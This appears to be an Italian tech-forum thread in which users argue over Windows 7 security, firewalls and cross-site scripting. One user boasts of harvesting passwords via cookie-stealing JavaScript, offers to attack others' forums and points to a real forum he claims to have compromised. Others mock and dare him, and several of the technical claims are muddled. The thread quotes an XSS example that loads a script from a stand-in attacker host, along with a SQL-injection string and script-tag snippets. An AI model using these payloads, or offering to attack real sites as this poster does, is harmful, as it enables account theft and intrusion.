vabbe le info le ho fornite io.. il collegamento tra le 2 le può fare solo chi è a conoscenza di tali dettagli :ciapet:
in nessun portale troverai il mio nome e cognome :cool:
claro.
neanche il mio. Certo che poi è PIENO di sistemi esposti sul web in cui ci sono tutti i dettagli di tutti (x es le porcate che fa sogei :D) ma lì purtroppo non ci si può far nulla.

non basta "non usare" IE.. qualsiasi prg che ti gira in locale, se dovesse parsare un URL (tipo windows explorer), userebbe le dll di IE..
quindi ce sta poco da fare.. anche se non vuoi IE lo usi comunque :muro:


ok, ma se IE non ha accesso alla porta 80 non credo che riesca a uscire...

ok, ma se IE non ha accesso alla porta 80 non credo che riesca a uscire...

iexplorer.exe è una cosa...
pippo.exe che fa dllAttach sulle dll di IExplorer.exe, un'altra..
non puoi fermarlo :read:

esistono diverse tecniche.. una di queste si chiama XSS..
e funziona bene :read:
https://it.wikipedia.org/wiki/Cross-site_scripting
vabbè, bisogna bucare hwup per mettere un proprio script, no? una volta che è bucato, se si vogliono raccogliere dati mi sembra + interessante guardare un log o il db che non mettere dei js da qualche parte.

iexplorer.exe è una cosa...
pippo.exe che fa dllAttach sulle dll di IExplorer.exe, un'altra..
non puoi fermarlo :read:
non so come funzioni nel dettaglio il fw di win, ma nella mia ignoranza suppongo che se nego l'uscita a tutto salvo quelli che hanno una regola per uscire, a meno di bachi e implementazioni alla CdC pippo.exe NON esce, no?

vabbè, bisogna bucare hwup per mettere un proprio script, no? una volta che è bucato, se si vogliono raccogliere dati mi sembra + interessante guardare un log o il db che non mettere dei js da qualche parte.

nono ch ebucare... è semplice...
te faccio un es banale.. io adesso posto un link ad una pagina php, al cui interno ce sta uno javascript che ti parsa i cookie..
tu ce clicki e bam, io so le tue password :cool:

oppure meglio ancora, posto qui sul forum una bella foto fake, che in realtà fa una request alla pagina PHP di cui sopra..
così senza neanche cliccarci, so le pass di tutti..

è per questo che nei forum non vengono accettati i caratteri <>..
però se uno pubblica un URL qualsiasi, non ce so difese :read:

non so come funzioni nel dettaglio il fw di win, ma nella mia ignoranza suppongo che se nego l'uscita a tutto salvo quelli che hanno una regola per uscire, a meno di bachi e implementazioni alla CdC pippo.exe NON esce, no?

e se l'url malevolo punta alla 8080?
e cmq che fai, chiudi la porta 80 a tutto tranne firefox? :asd:
poi ti riduci come me che non usavo piu win7 se non offline...

iexplorer.exe è una cosa...
pippo.exe che fa dllAttach sulle dll di IExplorer.exe, un'altra..
non puoi fermarlo :read:
FW aziendale, questo sconosciuto :rolleyes:

nono ch ebucare... è semplice...
te faccio un es banale.. io adesso posto un link ad una pagina php, al cui interno ce sta uno javascript che ti parsa i cookie..
tu ce clicki e bam, io so le tue password :cool:
grazie, ma noscript serve a quello :D

oppure meglio ancora, posto qui sul forum una bella foto fake, che in realtà fa una request alla pagina PHP di cui sopra..
così senza neanche cliccarci, so le pass di tutti..
è per questo che nei forum non vengono accettati i caratteri <>..
tipo quella di prima?!? azz, l'ho cliccata :D
'so fottuto :p
ma >>>>>><<<<<< li accetta... quindi? :confused:

però se uno pubblica un URL qualsiasi, non ce so difese :read:
beh, se metti www.pincopallo.it/tibuco.js certo che buchi, sempre che non ci sia noscript sul client.

FW aziendale, questo sconosciuto :rolleyes:

e che ce fai? cioè o blocchi TUTTO... o sei vulnerabile.. :read:

grazie, ma noscript serve a quello :D


tipo quella di prima?!? azz, l'ho cliccata :D
'so fottuto :p
ma >>>>>><<<<<< li accetta... quindi? :confused:


beh, se metti www.pincopallo.it/tibuco.js certo che buchi, sempre che non ci sia noscript sul client.

ovviamente nell'ultimo caso è necessario il click dell'utente..
ma una foto che fa invece di fare get su una .JPG, fa la get al tuo script..
ti fotte in automatico :ciapet: senza interazioni

se fai una prova, e metti <script>alert('ciao')</script>,
il motore te la stampa in modo speciale

e se l'url malevolo punta alla 8080?
e cmq che fai, chiudi la porta 80 a tutto tranne firefox? :asd:
poi ti riduci come me che non usavo piu win7 se non offline...

certo. tutto chiuso a tutto.
il sw che esce lo imposto io a manina, con porta, e se è il caso anche IP.
per es il client di posta esce solo sulle porte della posta. niente 80, nè 8080 nè un tubo. Voglio vedere come fa un link ad infettarmi :p

comunque non facciamo lamerate se no ce bannano.. :sofico:

certo. tutto chiuso a tutto.
il sw che esce lo imposto io a manina, con porta, e se è il caso anche IP.
per es il client di posta esce solo sulle porte della posta. niente 80, nè 8080 nè un tubo. Voglio vedere come fa un link ad infettarmi :p

te l'ho detto.. basta che pippo.exe esca su una porta da te non segnalata..
poi se chiudi TUTTE le porte allora vabbè, come se avessi il pc spento :asd:

ovviamente nell'ultimo caso è necessario il click dell'utente..
ma una foto che fa invece di fare get su una .JPG, fa la get al tuo script..
ti fotte in automatico :ciapet: senza interazioni

se fai una prova, e metti <script>alert('ciao')</script>,
il motore te la stampa in modo speciale
cioè nel tag img metti un js al posto di un jpg? :confused:
voglio sperare che qualunque browser sputi in faccia a una html del genere.

sig. Barigia che browser permette questa manovra esattamente?

se sig. Brambilla :asd:
non ho capito la domanda :wtf:

sig. Barigia che browser permette questa manovra esattamente?

comunque non facciamo lamerate se no ce bannano.. :sofico:

beccato? :D

cioè nel tag img metti un js al posto di un jpg? :confused:
voglio sperare che qualunque browser sputi in faccia a una html del genere.

<img src="urlAdunoScript.js"> è equivalente a cliccare sull'url :asd:
potere dell'html :sbonk:

beccato? :D

no che beccato, però stiamo "scriptando" le pagine.. meglio non abusare :asd:

voglio sperare che qualunque browser sputi in faccia a una html del genere.
ma che sputa e sputa.. i browsers parsano tutto... è lato server a non dover fornire pagine exploitabili... :read:

te l'ho detto.. basta che pippo.exe esca su una porta da te non segnalata..
poi se chiudi TUTTE le porte allora vabbè, come se avessi il pc spento :asd:
certo, tutte chiuse. non vedo perchè dovrebbero essere aperte.
quando un sw deve uscire (sostanzialmente solo browser e mail) c'è la sua regoletta per farlo uscire, con indicata la porta a cui si può collegare.

postami il codice che permette di accedere a coockies non cross domain, e poi indicami che versione di edge, chrome e firefox ti permette di utilizzarlo...

che intendi per "non cross domain"?
cioè vuoi sapere i tuoi cookies? usa temperdata (estensione firefox)
te li sviscera tutti :read:

ma che sputa e sputa.. i browsers parsano tutto... è lato server a non dover fornire pagine exploitabili... :read:
<img src="urlAdunoScript.js"> è equivalente a cliccare sull'url :asd:
potere dell'html :sbonk:
ah. no buono. :eek:
devo fare qlc test.

no che beccato, però stiamo "scriptando" le pagine.. meglio non abusare :asd:
cioè si può infilare dei js nei form del forum?
oddio, spero di no, sarebbe un vero cesso.

cmq x precauzione niente js per il dominio hwupgrade.it :p

ha ragione Nicodemo (che guarda un pò dopo avermi chiamato "quel tale" mi sta dando pure ragione :asd: ).. su SSD win10 è come win7 su HDD (forse anche meglio) :read:

Non ho mai detto questo, dai se vuoi trollare devi sforzarti di far di meglio :D

sig Barigia LukeIlBello LukeHack ovviamente tutti sanno che il browser ha accesso in locale a tutti i cookies, quello che chiedo è un codice funzionante per leggere tutti i cookies da un sito remoto con url compromesso/immagine finta and so on e dimmi quale browser permette alla tua pagina di fare questa manovra in tranquillità. Poi indicami chi annega in un cookie le credenziali come id utente e la password...

Campa cavallo, nel migliore dei casi avrai il solito profluvio di cazzate :D

Non ho mai detto questo, dai se vuoi trollare devi sforzarti di far di meglio :D

hai scritto che win10 su SSD va meglio che su HDD :read:
quindi, hai dato ragione al lukeIlBello pensiero :sofico:

ma no, basta una pagina, tramite javascript scrivi "readAllCookies" e hai letto tutte le password del mondo e sei diventato ricco. Poi nascondi lo script su un url di un immagine e il browser quando non riuscirà a parsarne il contenuto proverà ad eseguirlo in tutte le maniere possibili, quindi come fosse un jar, un archivio, un eseguibile e naturalmente come javascript e ne permetterà l'esecuzione (di cosa non si sa), ovviamente ignorerà che l'url di richiesta è diverso dagli url dei coockies e contemporaneamente bloccherà tutte le sessioni, https incluse, per permettere a questo exploit di creare un super sessione che possa dominare indiscussa sul pc del malcapitato. E' un exploit noto che mette a repentaglio praticamente qualsiasi operazione web, ma la gente è pigra e ms non lo ha ancora fixato...

ringraziamo per la illuminante lezione il sig Barigia LukeIlBello LukeHack...

cala il sipario e applausi...

Non capisco che ci va a fare alla Sogei tutti i santi giorni per guadagnare la pagnotta, al suo posto starei sdraiato sotto le palme ai caraibi tutto l'anno, alla facciaccia dei "fessi" di HwUpgrade forum :)

sig Barigia LukeIlBello LukeHack ovviamente tutti sanno che il browser ha accesso in locale a tutti i cookies, quello che chiedo è un codice funzionante per leggere tutti i cookies da un sito remoto con url compromesso/immagine finta and so on e dimmi quale browser permette alla tua pagina di fare questa manovra in tranquillità. Poi indicami chi annega in un cookie le credenziali come id utente e la password...

il codice funzionante consiste nell'embeddare nella form in cui posti, uno script che, scrutando i cookies, collezioni user e pass e successivamente faccia il post di queste info ad un tuo server php (o java)..
appena arrivo a casa ti posto il mio ultimo "lavoro" :ciapet:

Campa cavallo, nel migliore dei casi avrai il solito profluvio di cazzate :D

sisi io dico un sacco di cazzate, però poi la gente sul webbe mi evita come la peste, scappa a gambe levate :asd:

hai scritto che win10 su SSD va meglio che su HDD :read:
quindi, hai dato ragione al lukeIlBello pensiero :sofico:

Qualunque OS e aggiungo qualunque software va meglio su SSD che su HD.

Ritenta sarai più fortunato col trolling :D

sisi io dico un sacco di cazzate, però poi la gente sul webbe mi evita come la peste, scappa a gambe levate :asd:

Certo se posti foto come quelle, mica tutti hanno tutto quel fegato... :O

ma no, basta una pagina, tramite javascript scrivi "readAllCookies" e hai letto tutte le password del mondo e sei diventato ricco. Poi nascondi lo script su un url di un immagine e il browser quando non riuscirà a parsarne il contenuto proverà ad eseguirlo in tutte le maniere possibili, quindi come fosse un jar, un archivio, un eseguibile e naturalmente come javascript e ne permetterà l'esecuzione (di cosa non si sa), ovviamente ignorerà che l'url di richiesta è diverso dagli url dei coockies e contemporaneamente bloccherà tutte le sessioni, https incluse, per permettere a questo exploit di creare un super sessione che possa dominare indiscussa sul pc del malcapitato. E' un exploit noto che mette a repentaglio praticamente qualsiasi operazione web, ma la gente è pigra e ms non lo ha ancora fixato...

ringraziamo per la illuminante lezione il sig Barigia LukeIlBello LukeHack...

cala il sipario e applausi...
facciamo una prova? NON QUI ovviamente..
postami un tuo forum, dove tu sei admin e io utente normale..
in 10 minuti ti faccio un'escalation di privilegi da farti passare lo spirito da supercazzola :asd:

Non capisco che ci va a fare alla Sogei tutti i santi giorni per guadagnare la pagnotta, al suo posto starei sdraiato sotto le palme ai caraibi tutto l'anno, alla facciaccia dei "fessi" di HwUpgrade forum :)

se ate sta bene fare il cyber criminale per gli spammers russi e ucraini :asd:
a me no :read:

se ate sta bene fare il cyber criminale per gli spammers russi e ucraini :asd:
a me no :read:

Quindi adesso siamo passati agli spammers? A me sta bene non postare cazzate, a te invece viene naturale. :D

comunque per chi avesse visto il mio profilo su linkedin, in fondo ci sono le mie pubblicazioni...
andatevele a vedere prima di fare gli spiritosi.. :sbonk:

A me sta bene non postare cazzate, a te invece viene naturale. :D

link al tuo forum? :read:

link al tuo forum? :read:

https://www.hwupgrade.it/forum/

per la cronaca se non ci riesci posto il tuo nome, cognome, indirizzo e numero di telefono qui sul forum, mi sembra uno scambio equo che dici?

ma dici Barigia? posta pure è un nome fake :asd:
e comunque la tecnica XSS è robetta da starter..
sin troppo facile :sborone:

comincia cmq a linkarmi il forum in cui posso crearmi un'id, ed ovviamente nel quale hai privilegi superiori ai miei :read:

https://www.hwupgrade.it/forum/

no questo è tabù..
non voglio rischiare di inimicarmi nessuno qui :read:

www.hwupgrade.org/

ti do una settimana...auguri...

non lo conoscevo! non è legato a questo spero
non è neanche in SSL :asd:
in questo sei almeno mod o admin? che nick hai?

18 pagine, non sarebbe il caso di aprire un thread dedicato a "microsoft, scottanti verità e cose che non vogliono tu sappia"? :asd:

18 pagine, non sarebbe il caso di aprire un thread dedicato a "microsoft, scottanti verità e cose che non vogliono tu sappia"? :asd:

beh ce ne sta una molto HOT anche se un pò old...
MS ha usato FreeBSD sui suoi server! al posto di win2kkServer :asd:
incredibile amisci! :read:

https://www.hwupgrade.it/forum/

non funziona la form di registrazione, perchè il captcha è v1 e non funzionante.. :stordita:
creami tu una login o segnala agli admin questo "leggero" malfunzionamento..
:mbe: :fagiano:

ok sfida accettata deduco, hai una settimana per acquisire privilegi di amministrazione e dimostrarlo...auguri...

si ma prima mi devo loggare come utente normale..
e finchè non ho l alogin (la form non funge) o me la dai tu o passano a captcha v2.. :read:
accetterò la sfida quando avrò la login :sborone:

E la marmotta confezionava la cioccolata :read:

E la marmotta confezionava la cioccolata :read:

se magari mi deste un forum dove mi posso registrare :read:
ovviamente dopo il successo dell'escalation sarete tutti miei clienti spero :cool:

https://www.tomshw.it/forum/

il mio nick è quello con data di nascita 07/11/1979, entri, scali, accedi alla lista utenti e mi restituisci il nick...facile no?

siti così grandi rischio troppo.. mi mandano le guardie a casa.. :help:
avete un forum tipo mammepancine? :asd:
o quelli della lega di calcio o meglio ancora fantacalcio...
robetta non monitorata..abbiate pietà voglio vedere il cielo senza barre verticali :D

se magari mi deste un forum dove mi posso registrare :read:
ovviamente dopo il successo dell'escalation sarete tutti miei clienti spero :cool:

Il web è strapieno di forum su cui ti puoi registrare, in uno ci sei già. Molti sono sostanzialmente abbandonati. Ci facci sapere le mirabolanti avventure o incartature di cioccolata :)

Il web è strapieno di forum su cui ti puoi registrare, in uno ci sei già. Molti sono sostanzialmente abbandonati. Ci facci sapere le mirabolanti avventure o incartature di cioccolata :)

quindi posso scegliere io??
allora ve ne do uno che ho gia "curato"..
è il forum della lega di FIFA
http://www.promultileague.it/foro/viewforum.php?f=1
io qui esisto gia ho una login, se tu o l'altro utente vi registrate ci troviamo li, facciamo finta di postare tanto per avere un'attività, e vi dirò le vs.rispettive password :cool:

Ma esattamente 19 pagine con cosa le avete riempite?

quindi posso scegliere io??
allora ve ne do uno che ho gia "curato"..
è il forum della lega di FIFA
http://www.promultileague.it/foro/viewforum.php?f=1
io qui esisto gia ho una login, se tu o l'altro utente vi registrate ci troviamo li, facciamo finta di postare tanto per avere un'attività, e vi dirò le vs.rispettive password :cool:

https://i.imgur.com/5prKVcH.png

Riprova, sarai più fortunato.

Ma esattamente 19 pagine con cosa le avete riempite?

Con i deliri di un pessimo troll. Chiedo scusa per averlo nutrito qualche oretta, mi fermo qui :)

https://i.imgur.com/5prKVcH.png

Riprova, sarai più fortunato.

si vabbè, vuoi un forum con form non protetto da sql injection? ok non sei in grado...

in realtà SSL o no cambia poco..tanto i cookies sono sempre in chiaro nel pc in locale..
comunque, datemi voi un forum che non sia www.nasa.com o microfost.com o fbi.gov.. :sofico:
robetta come dicevo frequentata poco e non monitorata ..

ah, la sql injection non c'entra na mazza :sbonk:

Con i deliri di un pessimo troll. Chiedo scusa per averlo nutrito qualche oretta, mi fermo qui :)

che deliri? :wtf:
tutto vero qui, disponibile a dare Proof Of Concept ...
cmq vi lascio un pò di siti in cui ho lasciato "autografi" :sborone:
http://www.securiteam.com/exploits/6A0060AH5G.html (tra gli autori)
https://0day.today/author/1809

ah, la sql injection non c'entra na mazza :sbonk:
fa figo dire SQL INJECTION

fa figo dire SQL INJECTION

già :sbonk:

sono curioso di vedere all'opera e imparare a evitare brutte cose :)

era per dire un exploit talmente vecchio che banale che se ne fosse affetto sarebbe al pari di avere password di amministrazione in prima pagina...prendi un forum a caso...

https://forum.alfemminile.com/forum/

vai...

ecco, qua gia molto meglio, peccato che il forum non prenda i caratteri <> (appena provato).. come premesso 2 pagine dietro, è necessario che il forum accetti sti 2 caratteri perchè l'XSS funga :stordita:

se ne hai un altro in cui provare.. se no ce sta sempre quello in cui gioco da provare :sofico:

ecco, qua gia molto meglio, peccato che il forum non prenda i caratteri <> (appena provato).. come premesso 2 pagine dietro, è necessario che il forum accetti sti 2 caratteri perchè l'XSS funga :stordita:



ROTFL che sagoma :) Sei arrivato al livello del virus albanese:


In questo momento voi ha ricevuto il "virus albanese"

Siccome noi di Albania non ha esperienza di software e programmazione, questo virus albanese funziona su principio di fiducia e cooperazione.

Allora noi prega voi adesso cancella tutti i file di vostro ard disc e spedisce questo virus a tutti amici di vostra rubrica.

Grazie per fiducia e cooperazione.

E Buono 2000due!

ecco, qua gia molto meglio, peccato che il forum non prenda i caratteri <> (appena provato).. come premesso 2 pagine dietro, è necessario che il forum accetti sti 2 caratteri perchè l'XSS funga :stordita:

se ne hai un altro in cui provare.. se no ce sta sempre quello in cui gioco da provare :sofico:

Sarai anche Bello ma mi sembri un po' troppo difficile da accontentare, se continui cosi è facile che le password te le da lui per disperazione.

Sarai anche Bello ma mi sembri un po' troppo difficile da accontentare, se continui cosi è facile che le password te le da lui per disperazione.

Oh, il social engineering è una parte fondamentale dell'hacking :sbonk:

ecco, qua gia molto meglio, peccato che il forum non prenda i caratteri <> (appena provato).. come premesso 2 pagine dietro, è necessario che il forum accetti sti 2 caratteri perchè l'XSS funga :stordita:

se ne hai un altro in cui provare.. se no ce sta sempre quello in cui gioco da provare :sofico:si spera che tutti i CMS abbiano implementato qualche filtro da almeno una decina d'anni .
però non ho capito dove andrebbero messi 'sti caratteri... qua per es li hai messi, quindi? :confused:

ROTFL che sagoma :) Sei arrivato al livello del virus albanese:
[I]In questo momento voi ha ricevuto il "virus albanese"...

LOL cmq per me un sacco di gente si infetterebbe. :D

e che ce fai? cioè o blocchi TUTTO... o sei vulnerabile.. :read:
Eh si perchè nelle aziende di prassi è tutto aperto, cambia lavoro va :rolleyes:

e a corollario aggiungo che quando ho sparato la cazzata della sqlinjection non ho sbagliato di molto, stai cercando un forum talmente bucato da accettare attacchi di venti anni fa...

Meeee...
Ma quanto avete scritto ?

Comunque, prendere uno dei milioni di forum amatoriali creati con phpBB, non mi pare dimostrazione di conoscenza, la dimostrazione che sei uno tosto la dai prendendo di mira un forum bello cazzuto, hai paura del gabbio ?
Allora l'hacking non fa per te !

ROTFL che sagoma :) Sei arrivato al livello del virus albanese:


In questo momento voi ha ricevuto il "virus albanese"

Siccome noi di Albania non ha esperienza di software e programmazione, questo virus albanese funziona su principio di fiducia e cooperazione.

Allora noi prega voi adesso cancella tutti i file di vostro ard disc e spedisce questo virus a tutti amici di vostra rubrica.

Grazie per fiducia e cooperazione.

E Buono 2000due!
il virus albanese resta il top :sofico:
c'è solo da inchinarsi

Sarai anche Bello ma mi sembri un po' troppo difficile da accontentare, se continui cosi è facile che le password te le da lui per disperazione.

10 anni fa nessun framework alla joomla inglobava sti controlli..
ovviamente adesso sono molto più attenti a non farsi embeddare script.

ecco xchè è meglio virare su siti meno diffusi per tentare ste tecniche, quelli grossi hanno già subito il danno XSS.. e colle form classiche è facilissimo triggerarlo :O

PS. il mio nick non è relativo alla mia "avvenenza" fisica :sofico:
è un omaggio a un grande attore, che nel film dell'avatar interpretava Eddie il bello ..

si spera che tutti i CMS abbiano implementato qualche filtro da almeno una decina d'anni .
però non ho capito dove andrebbero messi 'sti caratteri... qua per es li hai messi, quindi? :confused:

infatti è così, ormai ste tecniche sono superate.. ma non significa che non funzionino.. sono assolutamente efficaci laddove sia possibile inserire sti tags, che vanno messi nelle form in cui posti..
li ho messi nel forum suggeritomi dall'utente, ed a fronte di un tag <script>ciao</script>.. lui prende solo ciao :D

per es. nel forum che ho postato io, lì i controlli non li fa.. e quindi si becca tutti i tag e di conseguenza gli altri utenti che leggono la mia form, si vedono lanciare il javascript che fa il POST dei cookies..che contengono user e pass..e la post arriva su un mio server php o jsp che raccoglie sti dati su un db in locale al server php o jsp..
molto semplice come tecnica :read:

Eh si perchè nelle aziende di prassi è tutto aperto, cambia lavoro va :rolleyes:

e chi ha parlato di aziende :mbe:
il tipo che non sa se continuare ad usare win7 a cui ho risposto, è un privato :sbonk:
cambia lenti :sofico:

e a corollario aggiungo che quando ho sparato la cazzata della sqlinjection non ho sbagliato di molto, stai cercando un forum talmente bucato da accettare attacchi di venti anni fa...

il forum è modernissimo, solo che il framework usato non ha la tinychat o come se chiama.. ma ne ha una propria che accetta i javascript.. :read:

Meeee...
Ma quanto avete scritto ?

Comunque, prendere uno dei milioni di forum amatoriali creati con phpBB, non mi pare dimostrazione di conoscenza, la dimostrazione che sei uno tosto la dai prendendo di mira un forum bello cazzuto, hai paura del gabbio ?
Allora l'hacking non fa per te !


in realtà tutto il discorso è nato dalla mia ipotesi per cui un javascript che ingloba un payload in grado di exploitare meltdown v2 o v3, sia assolutamente devastante negli OS tipo win7 e inferiori, proprio a causa del fatto che un javascript viene "elaborato" indiscrinatamente dai browser.. (a meno di noscript ovviamente)..

se per dimostrare questo mi si da una form che NON PARSA I JAVASCRIPT, è come chiedere ad einstein di dimostrare la relatività ristretta senza eclissi :sofico: (vabbè forse ho esagerato :asd: ) ..

infatti è così, ormai ste tecniche sono superate.. ma non significa che non funzionino.. sono assolutamente efficaci laddove sia possibile inserire sti tags, che vanno messi nelle form in cui posti..
li ho messi nel forum suggeritomi dall'utente, ed a fronte di un tag <script>ciao</script>.. lui prende solo ciao :D
correggimi se sbaglio, ma potrebbe anche solo segare il tag, non è detto che esegua quel che c'è dentro. Cioè, ci fosse codice al posto di ciao, vedresti il codice come testo in chiaro, ma non verrebbe cmq eseguito. Non è bello ma neanche pericoloso.

per es. nel forum che ho postato io, lì i controlli non li fa.. e quindi si becca tutti i tag e di conseguenza gli altri utenti che leggono la mia form, si vedono lanciare il javascript che fa il POST dei cookies..che contengono user e pass..e la post arriva su un mio server php o jsp che raccoglie sti dati su un db in locale al server php o jsp..
molto semplice come tecnica :read:
ok, quindi funziona se il sito pubblica dei post. Se il sito ha esposto solo il form di login (e gli utenti sono affidabili) mi pare di capire che non è sfruttabile.

il forum è modernissimo, solo che il framework usato non ha la tinychat o come se chiama.. ma ne ha una propria che accetta i javascript.. :read:
intendi l'editor wysiwyg? tinymce? che poi se non erro a occhio è l'editor anche qua su hwup.

quindi firefox 62 su win 7 è diverso da firefox 62 su win 10? rispondi con un si o con un no grazie...

nel codice sorgente no, negli effetti sull'OS assolutamente si :O

correggimi se sbaglio, ma potrebbe anche solo segare il tag, non è detto che esegua quel che c'è dentro. Cioè, ci fosse codice al posto di ciao, vedresti il codice come testo in chiaro, ma non verrebbe cmq eseguito. Non è bello ma neanche pericoloso.


ok, quindi funziona se il sito pubblica dei post. Se il sito ha esposto solo il form di login (e gli utenti sono affidabili) mi pare di capire che non è sfruttabile.

se il forum pubblica e parsa la form con il javascript, il client (qualsiasi) lo esegue..
ma ce ne sono di modi per "embeddare" un javascript..
posso postare un tag <img src='mioscript.js'>, che è esattamente equivalente a fare la GET a tale script..

puoi provare a farti una form in html e provare sti giochetti.. :O

se per dimostrare questo mi si da una form che NON PARSA I JAVASCRIPT, è come chiedere ad einstein di dimostrare la relatività ristretta senza eclissi :sofico: (vabbè forse ho esagerato :asd: ) ..

in realtà l'ha dimostrato un inglese, non enistein :p
c'è un film in proposito.

intendi l'editor wysiwyg? tinymce? che poi se non erro a occhio è l'editor anche qua su hwup.

esatto, tinymce quello li :D

quindi firefox è bucato ed esegue codice script annegato nei messaggi ma. E' questo che stai sostenendo? si/no

nono, è l'html ad essere "buggato"...
non il browser.. XSS funge su qualsiasi browser..
è l'os si preoccupa di bloccare tale attacco, quindi su win 10 non c'è problema mentre su 7 fa danni
qui è corretto :O

se il forum pubblica e parsa la form con il javascript, il client (qualsiasi) lo esegue..
ma ce ne sono di modi per "embeddare" un javascript..
posso postare un tag <img src='mioscript.js'>, che è esattamente equivalente a fare la GET a tale script..

puoi provare a farti una form in html e provare sti giochetti.. :O

assolutamente si. incidentalmente posso anche giocare con un server web che pubblica contenuti (e di cui amministro il CMS), quindi proverò, ovviamente al fine di imparare a prevenire i rischi. grazie delle info :)

ps: anche se confidavo che i browser fossero un po' più "rigorosi"... :(

in realtà l'ha dimostrato un inglese, non enistein :p
c'è un film in proposito.

oddio questa mi è nuova :sofico:
storicamente mi risulta che abbia preso il nobel proprio dopo aver dimostrato la sua teoria nel modo di cui sopra :read:

esatto, tinymce quello li :D
in effetti deve essere talmente complicato che ho sempre avuto il dubbio che possa creare problemi. per fortuna lo espongo solo ad utenti che non hanno nessun interesse a far danni o scalare privilegi.

in effetti deve essere talmente complicato che ho sempre avuto il dubbio che possa creare problemi. per fortuna lo espongo solo ad utenti che non hanno nessun interesse a far danni o scalare privilegi.

te prova a embeddare script.. se non li accetta (come per es. qui su sto forum) allora stai a posto :cool:

oddio questa mi è nuova :sofico:
storicamente mi risulta che abbia preso il nobel proprio dopo aver dimostrato la sua teoria nel modo di cui sopra :read:
questo il film https://it.wikipedia.org/wiki/Il_mio_amico_Einstein
secondo il film sarebbe stato Sir Arthur Stanley Eddington. Ho preso per buona la ricostruzione cinematografica, ma suppongo che in linea di max sia corretta...

se il forum pubblica e parsa la form con il javascript, il client (qualsiasi) lo esegue..
ma ce ne sono di modi per "embeddare" un javascript..
posso postare un tag <img src='mioscript.js'>, che è esattamente equivalente a fare la GET a tale script..

puoi provare a farti una form in html e provare sti giochetti.. :O

un altra tecnica è quella di embeddare XMLHttpRequest, che fa il post asincrono della form (ajax).. :read:

te prova a embeddare script.. se non li accetta (come per es. qui su sto forum) allora stai a posto :cool:
in realtà già il CMS che lo serve filtra i tag, anzi per la precisione permette solo quelli che gli dico io, e ovviamente <script> non c'è (pur non conoscendo il meccanismo di exploit, m'è sembrato istintivamente "insalubre" permetterlo :D)

un altra tecnica è quella di embeddare XMLHttpRequest, che fa il post asincrono della form (ajax).. :read:
qua andiamo troppo sul tecnico... :eek: :mbe: :D

non è l'html ad essere buggato, è la pagina che è scritta male, prova ne è che di tutti i link proposti nemmeno uno permetteva il tuo mirabolante attacco. Poi mescoli concetti, prima è un problema di script che permette la lettura dei cookies, poi è un problema di os, che evidentemente impedirà la lettura dei cookies (?!), poi è un attacco XSS, che nelle forme piu' evolute cerca proprio vulnerabilità lato browser, ma per te non è li il problema ma nell'os, poi affermi che i cookies sono sempre leggibili, in realtà sono associati normalmente alle sessioni e non leggibili da terzi, insomma un pastone in cui le chiacchere stanno a mille e una prova sul campo latita...

il concetto alla base è che javascript è in grado di girare localmente su ogni macchina grazie ai browser.. quindi se ci butti il payload giusto.. addio win7. :read:

XSS è una delle tecniche che dimostrano sto concetto, perchè contando sul banale inserimento di javascript, laddove non sia previsto, accade il danno: il POST dei cookies personali su server esterni (Cross Site scripting, da qui il nome della tecnica)...

spero ora sia più chiaro :cool:

ancora, posta un sito in cui questa cosa funziona...

postato ieri, eccolo :O
http://www.promultileague.it/foro/viewforum.php?f=1

ma non è che state dando troppa udienza al prossimo speaker del Black Hat 2019?? :mbe:

in realtà già il CMS che lo serve filtra i tag, anzi per la precisione permette solo quelli che gli dico io, e ovviamente <script> non c'è (pur non conoscendo il meccanismo di exploit, m'è sembrato istintivamente "insalubre" permetterlo :D)

hai fatto bene :D

e quello sarebbe un sito serio? è serio quanto te...

i siti "seri" (ossia quelli con profitti) da mo che so corsi ai ripari :read:
se non credi a me, leggi qui
https://www.roccobalzama.it/cosa-e-il-cross-site-scripting-xss-e-come-difendersi-da-un-attacco/

...Poi mescoli concetti, prima è un problema di script che permette la lettura dei cookies, poi è un problema di os, che evidentemente impedirà la lettura dei cookies (?!), poi è un attacco XSS, che nelle forme piu' evolute cerca proprio vulnerabilità lato browser, ma per te non è li il problema ma nell'os, poi affermi che i cookies sono sempre leggibili, in realtà sono associati normalmente alle sessioni e non leggibili da terzi, insomma un pastone in cui le chiacchere stanno a mille e una prova sul campo latita...
anche io che non ci capisco una cippa rispetto a voi, mi rendo conto che un attacco oggi come oggi va fatto mettendo insieme varie tecniche su vari fronti un passo alla volta...
quidni per stare ragionevolmente sicuri ci vuole un po' di configurazione sul firewall, un po' sul browser, un po' sul SO. Insomma, più serrature ci sono meglio è, e pace se qualcuna è rotta.

il concetto alla base è che javascript è in grado di girare localmente su ogni macchina grazie ai browser.. quindi se ci butti il payload giusto.. addio win7. :read:

XSS è una delle tecniche che dimostrano sto concetto, perchè contando sul banale inserimento di javascript, laddove non sia previsto, accade il danno: il POST dei cookies personali su server esterni (Cross Site scripting, da qui il nome della tecnica)...

spero ora sia più chiaro :cool:
a me era già chiaro che la parte JS è intesa come un segmento di una procedura più complessa.

in merito a win7, tra FW, noscript, aggiornamenti e payload non noto (questo è l'aseptto che ho capito meno, ma fa lostesso) penso che ci si possa sentire ancora abbastanza sicuri se non si è una banca :D

Mallory crea un account sul sito di Bob.

Mallory osserva che il sito di Bob contiene una vulnerabilità XSS. Se si va nella sezione News e si posta un commento, verrà visualizzato ciò che è stato digitato. Ma se il testo del commento contiene dei tag HTML i tag verranno visualizzati così come sono. Lo stesso accadrà per eventuali tag di script.

Mallory legge l’articolo nella sezione News e scrive in un commento. Nel commento inserisce questo testo: Io amo i cuccioli di questa storia. Sono così carini! <script src=”http://mallorysevilsite.com/authstealer.js”>,

Quando Alice (o chiunque altro utente) carica la pagina con il commento, lo script di Mallory viene eseguito, ruba il cookie di sessione di Alice e lo invia al server segreto di Mallory.

Mallory può quindi sfruttare la sessione di Alice e usare il suo account fino a una eventuale invalidazione del cookie[14] [15] .

:read: :sborone:

in merito a win7, tra FW, noscript, aggiornamenti e payload non noto (questo è l'aseptto che ho capito meno, ma fa lostesso) penso che ci si possa sentire ancora abbastanza sicuri se non si è una banca :D

Uomo avvisato, mezzo fottuto :sofico:

si certo e 1' OR '1' = '1 mi fa accedere al sito del pentagono...vogliamo vedere un sito serio in cui il tuo attacco funziona...
cos'è sto giochino coll'OR ? :confused:

cmq sito serio o non serio, è cmq interessante sapere cosa può succedere. Mica visitiamo sempre solo siti seri, no? :p
(e cmq pure yahoo ha perso milioni di credenziali...)

:read: :sborone:

ok, ma:
* deve essere stupido il cms ad accettare gli script
* deve essere stupido l'utente a non aver noscript (che anche se hai js attivo sul sito, dovrebbe bloccare il js da dominio diverso)...

